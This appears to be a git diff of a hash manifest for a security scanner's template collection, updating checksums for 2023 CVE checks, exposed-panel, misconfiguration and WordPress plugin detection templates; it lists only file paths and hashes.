+http/cves/2023/CVE-2023-34599.yaml:5e35a54ddbb379f2abfcaa39d9aab55ebc9b8878 +http/cves/2023/CVE-2023-3460.yaml:44604069007dc218e253165be51960c0e54ddb56 +http/cves/2023/CVE-2023-34659.yaml:a0c35912e17bc1a33f788c9c9e1e4115a293e0b5 +http/cves/2023/CVE-2023-34751.yaml:232b59b81efbcc6c346ea3123e78b183b1ee63a3 +http/cves/2023/CVE-2023-34752.yaml:01d5b1c12a467efecb83a9cd4ca24d08a5c06421 +http/cves/2023/CVE-2023-34753.yaml:872b33b77bd9f3ecb0aba82ecd467221f4d4affc +http/cves/2023/CVE-2023-34755.yaml:1b0106db5225bc2e8415757795c3aca91aea8884 +http/cves/2023/CVE-2023-34756.yaml:e754b5b113d7303e7460863327e892f997a26059 +http/cves/2023/CVE-2023-3479.yaml:2a982b602773602a2f143a68c1eaa786b51b73d4 +http/cves/2023/CVE-2023-34843.yaml:a5fb6c9f5c606dcc39a461a5152b9a4d5e99c131 http/cves/2023/CVE-2023-34960.yaml:0bff2805f68fb810b9e46e342ed1f68c58791816 -http/cves/2023/CVE-2023-35078.yaml:35a5a3bfffdd8e5bbc85f52081b6c548f9171564 -http/cves/2023/CVE-2023-35082.yaml:fea703b7473e17ee7f4f9bed64f07630ba0b3463 -http/cves/2023/CVE-2023-35813.yaml:99821737637579378abf8cfd7a790981a035bc86 -http/cves/2023/CVE-2023-35843.yaml:2a211030436faed5c6fbcbf45fd5b2703d7498aa -http/cves/2023/CVE-2023-35844.yaml:9975becc9a190302902c49e51bd56a65ecbdd781 -http/cves/2023/CVE-2023-35885.yaml:d847f1d9b44b6e71a865ec6b3a1901828a644564 -http/cves/2023/CVE-2023-36287.yaml:b70045441155ee3bfbc51319c266c625f2b21fb2 -http/cves/2023/CVE-2023-36289.yaml:f95ce625c0de559f7488a3f164570262155f188a +http/cves/2023/CVE-2023-35078.yaml:d6b0c5400e362296bb64f60800c075291b70b07d +http/cves/2023/CVE-2023-35082.yaml:45e86d38129b4202cd1dc6489d9a3042f3d8b249 +http/cves/2023/CVE-2023-35813.yaml:3d9dd783294d663995d431cd6f18151cdd1e15c8 +http/cves/2023/CVE-2023-35843.yaml:09ac0f8852eb3a03de64f323e63e2af384377be8 +http/cves/2023/CVE-2023-35844.yaml:be4302e730eb56bb848ced24a848a7d895695cc1 +http/cves/2023/CVE-2023-35885.yaml:16582afe5fc8d19ddc002be6506ab48fa9a4433c +http/cves/2023/CVE-2023-36287.yaml:78f5f68b26d38958dd77a212cb55b4ba91adc2e0 +http/cves/2023/CVE-2023-36289.yaml:afd70f82446fcc62160cd282d56c45335d49973d http/cves/2023/CVE-2023-36306.yaml:fea8677eec2dd2011b44a6c607a915d55280ec53 -http/cves/2023/CVE-2023-36346.yaml:fa6a9f2815b5ac0388f8303f6b8ea9441563da33 -http/cves/2023/CVE-2023-36844.yaml:b337983a6ecb140d40eb09cf45813eaaeb7c68e9 -http/cves/2023/CVE-2023-36845.yaml:cd4fc12c4c5881a8bc6a7a2202642e3226029026 -http/cves/2023/CVE-2023-36934.yaml:fc4ff2809b0c48a895eb8d65af219437a04765c1 +http/cves/2023/CVE-2023-36346.yaml:78701a9c7eebc39de1a4f78b2966dd2898dfa67f +http/cves/2023/CVE-2023-36844.yaml:6dd2c3a054345a5d83f0d1b773f064089ff4fee5 +http/cves/2023/CVE-2023-36845.yaml:6e0c4c4668e2e76cef47b57b86617ec8ef8e5aab +http/cves/2023/CVE-2023-36934.yaml:a02c51fa19be3661b73bbcd152f7693e43685961 http/cves/2023/CVE-2023-3710.yaml:51b96a227f13d62c04a8a5b022158ca8de1bfa2c -http/cves/2023/CVE-2023-37265.yaml:3e469d32e599777810bfbd7150a840cc56f23bc7 -http/cves/2023/CVE-2023-37266.yaml:7b6fa9ecf11e5898be29b03c5b44b6878ddaefc5 -http/cves/2023/CVE-2023-37270.yaml:1eb7ce827400c2e1964ef91c72373fa24692bf1b -http/cves/2023/CVE-2023-37462.yaml:7a543ce167cd97bc71c6d9669924e4f61531b251 +http/cves/2023/CVE-2023-37265.yaml:55ac93a396fb60fbf4e146373695c1a0ea10b3ac +http/cves/2023/CVE-2023-37266.yaml:cb7cfa6cc2bdd74cd0005ce0a008991191f46d6e +http/cves/2023/CVE-2023-37270.yaml:703c238e5c5e6475254d1442fd38ee4efc6e0240 +http/cves/2023/CVE-2023-37462.yaml:480e49398e53ac35fbbd8fd0ec0e1cc3b5fbe529 http/cves/2023/CVE-2023-37474.yaml:dc6120bda2aaac89294aad92202eb027d37df265 -http/cves/2023/CVE-2023-37580.yaml:75a1652a6f3bcb9c64d0f38706425061c0ba09c5 -http/cves/2023/CVE-2023-37629.yaml:2edac71319ead970aa38ff60c683ca8024d3442e -http/cves/2023/CVE-2023-3765.yaml:b7489f2612e55ca14fc3b7d72bf13d6380afffa0 -http/cves/2023/CVE-2023-37679.yaml:5bd2e2ee8f9e0e1e5dce18fcf5ee8a68bc490abf -http/cves/2023/CVE-2023-37728.yaml:279b5a379b4115a35527e1e5249c5442d72e43b9 -http/cves/2023/CVE-2023-37979.yaml:3d37c0501cffcffd42e0ec5a23f2682fcd31c8d2 +http/cves/2023/CVE-2023-37580.yaml:2a8506faf1c1f99d8a9e23a3bf0e9503f589aaaf +http/cves/2023/CVE-2023-37629.yaml:739e0dad7165419d29142cb65f8cfb8659f0ef21 +http/cves/2023/CVE-2023-3765.yaml:50b8a2b34a11582826d036027ec17366fcc194c0 +http/cves/2023/CVE-2023-37679.yaml:43b4675e81feb765c9c41e8760c1146d91388f3f +http/cves/2023/CVE-2023-37728.yaml:08b2f47bdb57fe5fd1cdbcfe53d39ab982fc61d4 +http/cves/2023/CVE-2023-37979.yaml:02d295ad2ee6ffa04b76315f01a184ae4e84589c http/cves/2023/CVE-2023-38035.yaml:15d889f727aeaff0c546f65f346dde3c5e5b23a5 http/cves/2023/CVE-2023-38205.yaml:7bb7d97ed69d6cd4edd58167b25180c87f97ad31 -http/cves/2023/CVE-2023-3836.yaml:0713747e4531ebc85f6960b1f2e5214c08eab172 -http/cves/2023/CVE-2023-3843.yaml:6819d734cc77d6e020c38e9e5bb9ac2d8685268a -http/cves/2023/CVE-2023-38433.yaml:e1099f8f8423da685dfa21173183891f9cb9e7d3 -http/cves/2023/CVE-2023-3844.yaml:ddfb9f4933ef1b4ba2b17c2c66145ac66f1e6617 -http/cves/2023/CVE-2023-3845.yaml:3ea7754ba51d0ce2941f9835eeb6f93f60379c6b -http/cves/2023/CVE-2023-3846.yaml:2dd4f23843ad843e453a33d0a234b292dda0deef -http/cves/2023/CVE-2023-3847.yaml:c39a8d9197a14c569bf106bef73158a20995f166 -http/cves/2023/CVE-2023-3848.yaml:adffe7662e5ed2d8bb71dc12a5fce7bd842e1e77 -http/cves/2023/CVE-2023-3849.yaml:345bfbcb5a7f19d1ad076de107da31aa50ed1824 -http/cves/2023/CVE-2023-38501.yaml:471708da0850f0b15f00e5037637d11a1b0152a9 +http/cves/2023/CVE-2023-3836.yaml:be9ea8df2411dfdbce64960dcbab6f0e0a40056f +http/cves/2023/CVE-2023-3843.yaml:e550d555049ef8299c19301a25fdd0c05b8ed71b +http/cves/2023/CVE-2023-38433.yaml:03f7bdde1bd16dba3b4e7cd574836270f95cf773 +http/cves/2023/CVE-2023-3844.yaml:222b4393b3c98c129115587c7dda44e2f4d0945c +http/cves/2023/CVE-2023-3845.yaml:2bf1db1ba30817796a533c15a634df2179579fea +http/cves/2023/CVE-2023-3846.yaml:c9f627fab95087c4735a312cf9c94596501b3f45 +http/cves/2023/CVE-2023-3847.yaml:827859d3b456b318bb64f778881731acb063bcef +http/cves/2023/CVE-2023-3848.yaml:5e06fd549c09823ddc10bb977d83334588ca15e2 +http/cves/2023/CVE-2023-3849.yaml:523adbeb7c666da3dfc57e65f906dd69a436c227 +http/cves/2023/CVE-2023-38501.yaml:946f7d15b566ad4f19848559a3c2802c046ad67a http/cves/2023/CVE-2023-38646.yaml:0c2cf4a078163bbb7069bc5c0537817b4c2fc769 -http/cves/2023/CVE-2023-39026.yaml:35b8020e1f1de9cf6142879c5d868817ccd22850 -http/cves/2023/CVE-2023-39108.yaml:39c89679360e9b4984d624a67a9bb506f77d0f67 -http/cves/2023/CVE-2023-39109.yaml:0a7db5f11025a193c12944d2b2347e837ea0cadd -http/cves/2023/CVE-2023-39110.yaml:561465853bb270532cb8060dbdca0880f649e34b +http/cves/2023/CVE-2023-39026.yaml:993cbbc4619325028236c8c700b5984b9e091467 +http/cves/2023/CVE-2023-39108.yaml:bebd3968caf87bd77d3d8987ec11bb4f41c6b7e5 +http/cves/2023/CVE-2023-39109.yaml:347cae3dc2ce9f695179b96d8b2198fe2ccd8666 +http/cves/2023/CVE-2023-39110.yaml:6a8affd271921b92cd05e764716157d8bd64ae9b http/cves/2023/CVE-2023-39120.yaml:9462c57e65e4d5929c6b9f1a18a31a7c9a3eb2db -http/cves/2023/CVE-2023-39141.yaml:890c781eb92a3c9a9a131e8d6ded3ca303afe556 -http/cves/2023/CVE-2023-39143.yaml:126a7b45e35b25da6535a3c88e7ad4848c85e068 -http/cves/2023/CVE-2023-3936.yaml:194308e3e00e31179a9aa98f6b24666ef704843e -http/cves/2023/CVE-2023-39361.yaml:fe00033405c17bf1766c1d8fa50d6a8581a21af1 -http/cves/2023/CVE-2023-39598.yaml:e3a44f19789968eefb76995018b434612ba7ccfe -http/cves/2023/CVE-2023-39600.yaml:4795abafda246ff8cf169a8abeb92bd899cc6f60 -http/cves/2023/CVE-2023-39676.yaml:aaf357e01b7239e92d7db80b00cad09eeabc3b3c -http/cves/2023/CVE-2023-39677.yaml:ec01f6712d15898821328d9ea88a72bbaea9b714 -http/cves/2023/CVE-2023-39700.yaml:9763609197d79b32df600c73301cbb991c48f13c -http/cves/2023/CVE-2023-40208.yaml:32bab7be891d542c375ff2a2d4ab286086ad86bb -http/cves/2023/CVE-2023-40779.yaml:a14e8f5f76849742d9032a53d666ea166e536368 -http/cves/2023/CVE-2023-4110.yaml:586cde197eea3c3571f16f1e42ae70a4f3bb7eb0 -http/cves/2023/CVE-2023-4111.yaml:24f56bca23f405ab6e68cc7128e2297900626484 -http/cves/2023/CVE-2023-4112.yaml:51ed3205beeb2ed239da208b1afb93b0a6c921ee -http/cves/2023/CVE-2023-4113.yaml:47c79b12507d51edde5ead48d6fc44d9849a6d15 -http/cves/2023/CVE-2023-4114.yaml:2c025241d3a221e9beb8d22d00a76459aa32e5bc -http/cves/2023/CVE-2023-4115.yaml:5f8cab78b040fbb827ac836a0dd27769b938948a -http/cves/2023/CVE-2023-4116.yaml:699262f21edee1e0232fb563a011c5cf57b8f0ab -http/cves/2023/CVE-2023-4148.yaml:12f4b612673e00fa6ac11e406d976d1d27dd284c -http/cves/2023/CVE-2023-41538.yaml:04d87983f9aa9058e1d120c97ec9ddaab13f1880 +http/cves/2023/CVE-2023-39141.yaml:e7044482a76f0e4b8ae78a1efa7bbb6424d54b5b +http/cves/2023/CVE-2023-39143.yaml:008020f02a5ea47988fc565695cbca03dc53431f +http/cves/2023/CVE-2023-3936.yaml:5da839cef2a87f80dfc91546651efb3a347d1c50 +http/cves/2023/CVE-2023-39361.yaml:63dc9638049648bacae0059b45ba69edf6fe82e7 +http/cves/2023/CVE-2023-39598.yaml:ac471b92427b029b231aa12b4168eb008675be19 +http/cves/2023/CVE-2023-39600.yaml:2dd582a387d1f7f5ab67b6f8634a2c95d3dd8d13 +http/cves/2023/CVE-2023-39676.yaml:440b0b39168f7b34f5fbce63a0ee99782a7fd18c +http/cves/2023/CVE-2023-39677.yaml:dd2131e91d05380ca7e48debbb35a77888654712 +http/cves/2023/CVE-2023-39700.yaml:e28f7a28486a5d6fd1b0cf746f0d4c6e8e915f69 +http/cves/2023/CVE-2023-40208.yaml:c37b21222839556a66321cb5d35bcd9406a4ee3b +http/cves/2023/CVE-2023-40779.yaml:856d216a9b4caa5aee70f111e768cdbce7868b80 +http/cves/2023/CVE-2023-4110.yaml:3dba1582195af3329d358639a958fff7e1d5612b +http/cves/2023/CVE-2023-4111.yaml:2422a9c4d3bce692dc760846e63db37fdf5fc82f +http/cves/2023/CVE-2023-4112.yaml:9e53ee8b695f0d8d409364e2b2d4689961c11340 +http/cves/2023/CVE-2023-4113.yaml:235c84e316e58c14f88e59333e6a5ba7e4f74b15 +http/cves/2023/CVE-2023-4114.yaml:a7bff55489f7e7e9ec5f32e687ec13fa131169ca +http/cves/2023/CVE-2023-4115.yaml:ae9cfc6bad75351b996f1b53e76424725be9e4e7 +http/cves/2023/CVE-2023-4116.yaml:b2f3c6a5ca8deb3963f3d52a5c7b6e8a61f97f4b +http/cves/2023/CVE-2023-4148.yaml:8dcf8cec4856cea68d25c555b0100988542ded6b +http/cves/2023/CVE-2023-41538.yaml:59fd14671b52e3c8a29a1d3560938b2fc52379cd http/cves/2023/CVE-2023-41642.yaml:8e47489121985e2be4465049d3462e7028fcb4a4 -http/cves/2023/CVE-2023-4168.yaml:c900c20e4ab61dd323651214004c5b5c675605e2 -http/cves/2023/CVE-2023-4173.yaml:e026d5af9634cc5b610378b61d739efb31d14d8c -http/cves/2023/CVE-2023-4174.yaml:85b2e83c8c7b98a58b0a3df18468f7896cb1031b +http/cves/2023/CVE-2023-4168.yaml:33d4e1f943be3b096d73556e3667d5c10f358a38 +http/cves/2023/CVE-2023-4173.yaml:ab30baaaa791a0515a9b9ca7f51899ee1c88311b +http/cves/2023/CVE-2023-4174.yaml:8139a90f8dc521c9a504dfef16995b002d7aef8f http/cves/2023/CVE-2023-41892.yaml:5fbc5a4c90bb396e94ae059aad3dbdb429e993f9 -http/cves/2023/CVE-2023-42442.yaml:d619ebff097c5a99f2889aae963fb42bb7b610e6 +http/cves/2023/CVE-2023-42442.yaml:f386a04d2666f2a6192f9ce0844bbb004137d217 http/cves/2023/CVE-2023-42793.yaml:38aa019e461e0600a340cd71fb1f22fd937e99b4 -http/cves/2023/CVE-2023-43261.yaml:a1fee43bd69282c43a0c7ab8ef3b816f3026818f -http/cves/2023/CVE-2023-4451.yaml:480a938d44101837dca71dd79fbd398153c047f0 +http/cves/2023/CVE-2023-43261.yaml:2c89c231444d8f1a1230279b24f9548550b5db07 +http/cves/2023/CVE-2023-4451.yaml:a41342da05df88f12d3cbc268210dc39a418963e http/cves/2023/CVE-2023-4547.yaml:3f0b10d12f3e7061b037a4167af035fec213cd19 -http/cves/2023/CVE-2023-4568.yaml:97f4814253b00e9bceae9934fa6b17b0efed35e1 -http/cves/2023/CVE-2023-45852.yaml:bbfec66da11218cd1fb0494ab2e1061007f80430 -http/cves/2023/CVE-2023-4634.yaml:dcdd00c438ebf6619fa75551577b19245cdf4d92 -http/cves/2023/CVE-2023-46747.yaml:0d68a4ed7ee4b66159209beabbbaddef81a2113a -http/cves/2023/CVE-2023-4714.yaml:5da92b7276f5a5987783ebfe3fdf1ce4d5ccd583 -http/cves/2023/CVE-2023-4966.yaml:b2adb7c8bd4a02489d2419602e5c85bb9f52e3bc -http/cves/2023/CVE-2023-4974.yaml:ebd6dae72c8f246b288db91653782e28fba8b867 +http/cves/2023/CVE-2023-4568.yaml:f1011704b3041cc0f40fd86b3d70b4d5029208e3 +http/cves/2023/CVE-2023-45852.yaml:689d15cbe2015a211978fe7d9c49dab6da06c499 +http/cves/2023/CVE-2023-4634.yaml:db4b84596f7bdef6cb219921bae9f86309378d11 +http/cves/2023/CVE-2023-46747.yaml:2e1c7ff7847508c6f76acf00636fc03506635c88 +http/cves/2023/CVE-2023-4714.yaml:327c73be28398d2c0eefe1ab10600b3f9d269980 +http/cves/2023/CVE-2023-4966.yaml:019edd221cbd1ea8c06ea977e8c9af623aa4020b +http/cves/2023/CVE-2023-4974.yaml:516fd4bd3b8c4f015703f85f7c8e218db59a1631 http/cves/2023/CVE-2023-5074.yaml:73b3da7227765027dfe24d3a0a9a184b3e6a930b -http/cves/2023/CVE-2023-5244.yaml:244521de522509361b3a15e78976b58c6714a9d1 +http/cves/2023/CVE-2023-5244.yaml:9dcdf1144cb538f0db7aeb4d6bc31fecd74a4c07 http/cves/2023/CVE-2023-5360.yaml:f03766409a04698eea94e54cbae80685fdef9ae6 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c @@ -3129,7 +3130,7 @@ http/exposed-panels/cisco/cisco-asa-panel.yaml:d32d9d23f6444ec300da1bcdacafd93d7 http/exposed-panels/cisco/cisco-edge-340.yaml:47cdaf07cf5edfe1b5353fe94fcd3febda061e7c http/exposed-panels/cisco/cisco-finesse-login.yaml:da503b8b2b03e497359e9130e8196d6021dd18e1 http/exposed-panels/cisco/cisco-integrated-login.yaml:1f7a155a77cd3563709e1fdbe689c0078a3104b8 -http/exposed-panels/cisco/cisco-ios-xe-panel.yaml:813d678cb5b0af66bdaaa22eccb968434c17e178 +http/exposed-panels/cisco/cisco-ios-xe-panel.yaml:2c371487ead75bc0b430bd7e4e245da6c453db3a http/exposed-panels/cisco/cisco-meraki-exposure.yaml:a1f35b678443b8dce729e0599d6e18a0228e9a5d http/exposed-panels/cisco/cisco-onprem-panel.yaml:96f783af4ea3377ed4f114e5fbaecae8e5dc3fcc http/exposed-panels/cisco/cisco-prime-infrastructure.yaml:cf7c74cb59e6029ba4a2d7c6fff6a52f728098fd @@ -3594,7 +3595,7 @@ http/exposed-panels/osticket/osticket-install.yaml:0493ded9c809026557c3246e32d78 http/exposed-panels/osticket-panel.yaml:bb50649a7fcebd17b893280830a298b44e835738 http/exposed-panels/otobo-panel.yaml:8889e51ea16ca6565b7fe303e841cdf757bbe668 http/exposed-panels/ourmgmt3-panel.yaml:9f45476f38f2732b5292b873e1000b2df6563da5 -http/exposed-panels/overseerr-panel.yaml:a98a8257c8ad8c0e118f24c6129f1c1ce9837638 +http/exposed-panels/overseerr-panel.yaml:a24c57c1804cf42816412d7654e74412ffb1acd9 http/exposed-panels/pacs-connexion-utilisateur.yaml:ec9fd6fb5826c43d847b6137005b868ab05727bd http/exposed-panels/pagespeed-global-admin.yaml:b75cb50c91bc94e526757ceb8a996595189587c6 http/exposed-panels/panabit-panel.yaml:0acd22ebb4f2e4f4ed0f40cb7014f81d3031eeb2 @@ -3622,7 +3623,7 @@ http/exposed-panels/pichome-panel.yaml:ecd10756b689ed1d53f4c4cf63d9b2eceeb6e3c9 http/exposed-panels/piwigo-panel.yaml:94df15d97051daf57e2b53ca31d19a2b4d510a06 http/exposed-panels/planet-estream-panel.yaml:26a2c3c6e939113d01a095f657daa43d617713a4 http/exposed-panels/plastic-scm-login.yaml:d870913c97d4b5a591928e9255266b4041dac5b8 -http/exposed-panels/plausible-panel.yaml:972ca67ba75218bb8e550c73682adf40b3b9ec52 +http/exposed-panels/plausible-panel.yaml:8ed36f6fa82cc2bc4d47b2132c8de7d5bd5b0a97 http/exposed-panels/plesk-obsidian-login.yaml:061550a03a290cb3ae96e62f70ad2abb14725e1c http/exposed-panels/plesk-onyx-login.yaml:9b97501002479e3a8c96fd77231cd56f0c82a30a http/exposed-panels/polycom-admin-detect.yaml:8ba362df791c6b4f38353dbb656308ac28031f0c @@ -4883,7 +4884,7 @@ http/misconfiguration/questdb-console.yaml:93799ff4643ea37c6e24ec3126856bae48046 http/misconfiguration/qvidium-management-system-exposed.yaml:8ce4fb3d6084d0d2ccbf10f6e2867469e61d435b http/misconfiguration/rabbitmq-exporter-metrics.yaml:2c7761213d01c09aec63358265354255f056cfdf http/misconfiguration/rack-mini-profiler.yaml:703505f2ed598f4cc1fe7cd6f29fc2b919fabd76 -http/misconfiguration/ray-dashboard.yaml:ef7e9e084be7395ba810abe0f9b4e59a56728869 +http/misconfiguration/ray-dashboard.yaml:2e3f405605989b665ae58427a55f16676ff03075 http/misconfiguration/rekognition-image-validation.yaml:320e0300b3a242448eeb3ac6d1967f27c741f890 http/misconfiguration/request-baskets-exposure.yaml:b614827e506c46c0fce808894aa754abe564dda7 http/misconfiguration/rethinkdb-admin-console.yaml:5898dfe2d5c65ff468a51596226569ab87ea6d17 @@ -6084,218 +6085,219 @@ http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:5ee26e19f863e5e475524389b0c435f37f95e179 -http/technologies/wordpress/plugins/add-to-any.yaml:e8631555cb3827b99c2a3d2db07affd842c91e80 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:4ee1108066a2f438b854ced491ba01bdf76e6d52 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:660112869f3b664ebd0cdac32584193b1c64511b -http/technologies/wordpress/plugins/akismet.yaml:9f24f841fc02e73244909429fb6218ce276c3d17 -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:7becda07ad8269f19dbbb0206a19077f7fbfa9ad -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:86ef7dd6393f3a288e5490b39b704ab56f9db5da -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:96807f026508809fd247bc5e6bc14b324f52a795 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:e3c5fe31ad708015bb5dda066307d81cad4b4b86 -http/technologies/wordpress/plugins/amp.yaml:9c50f41d0a47df72a59e29e27685c7b0c7371923 -http/technologies/wordpress/plugins/antispam-bee.yaml:12e014a2841060423ae432557696481af460f659 -http/technologies/wordpress/plugins/astra-sites.yaml:fa377e3a4d398ceb9cdb4658e7860a20c4c5625c -http/technologies/wordpress/plugins/astra-widgets.yaml:bbbd5007f0312ad5a3c9209349a3be1d93bfb871 -http/technologies/wordpress/plugins/autoptimize.yaml:7a6a2e22ba1fad32ba915b2b61209c3faa7fcf8d -http/technologies/wordpress/plugins/backwpup.yaml:df7845aee36c1e33235503c20f071d60fc0a465d -http/technologies/wordpress/plugins/better-search-replace.yaml:86de50f083b76d71023964b086e23daec9399596 -http/technologies/wordpress/plugins/better-wp-security.yaml:6b603b64fa2b69bb8f6131a344ce51b7ce8ea4c9 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:73c89e9bc279bdbb35df9af784c4c4c27af96df8 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:327e76c4b21310f79649536432208eb8b40458a0 -http/technologies/wordpress/plugins/breeze.yaml:307c79fa22b22877470f458d1ecb8494b9452846 -http/technologies/wordpress/plugins/broken-link-checker.yaml:025ecddce14611179910d6c4d2c17400e93efd6c -http/technologies/wordpress/plugins/child-theme-configurator.yaml:0b873966ca9069d1ee7e36dcc9814859cefcd841 -http/technologies/wordpress/plugins/classic-editor.yaml:b91012ca4249802702b11e2bf23a319e779ba58b -http/technologies/wordpress/plugins/classic-widgets.yaml:99a75c0ea66ba40c29e705f9883dc9a7a9b7380d -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0f27453b407d87e24373a8c49320a714923ed2cb +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:747b6ce22874ec3db175e6b7f4468a7980e8c174 -http/technologies/wordpress/plugins/coblocks.yaml:a68c6859f7bb832fc121113aa546a50eb3232b6a -http/technologies/wordpress/plugins/code-snippets.yaml:6eaeea3ced5981d9355a8fb18fb872c2f786230d -http/technologies/wordpress/plugins/coming-soon.yaml:ff3ae3ba91d12a6fa76102f02b4c2d76fb9d01ec -http/technologies/wordpress/plugins/complianz-gdpr.yaml:141fdc298dd0386a7e30ab54a95163165f6b1b90 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:e0a70d8ace4e4464a74bb29645928a8f9b6c09be -http/technologies/wordpress/plugins/contact-form-7.yaml:873bc11b184d406cc39dab971bfbb9891138fe8c -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:2ab5210490f033922afb8584271fa6c1971b3b02 -http/technologies/wordpress/plugins/cookie-law-info.yaml:d6e74c4ff68215c17247ada50527cfa0ba0c1b86 -http/technologies/wordpress/plugins/cookie-notice.yaml:6e8d7796a4aa7a757562f6a5bf67e01419a9ec25 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:7c36a6ec1bf35cce63c429a7e38860b3d7a91eed -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:76448d2b4a5241a593eccd8c70facc4fc2b8f040 -http/technologies/wordpress/plugins/custom-css-js.yaml:52b18b2ec7fa0cee613e984ba2bc3ea3d1b48c4b -http/technologies/wordpress/plugins/custom-fonts.yaml:71faa5185c0993799af64f099514fbd130f8b0bd -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:30e62775dfb7e845f4641bce976a561964884798 -http/technologies/wordpress/plugins/disable-comments.yaml:e25f2b152b67b4772da7b94345b7bad3f8a01062 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:b0c952f9d85e9b76e3a50d16fa0b558efd777a4a -http/technologies/wordpress/plugins/duplicate-page.yaml:60ae67d3e3c7db5274c7423a194042710a9bea6a -http/technologies/wordpress/plugins/duplicate-post.yaml:0cd87201fdbee31a1ef2d4b0e1fa9f511ef05ccd -http/technologies/wordpress/plugins/duplicator.yaml:b539488f4a2ae9872beca83fb40796fda79caae8 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:561b06ae2cf83e4e5614ca9b7f80eb755b29b980 -http/technologies/wordpress/plugins/easy-fancybox.yaml:6ea013bd4db90195adc89be33f7d5b0eea2ff442 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c 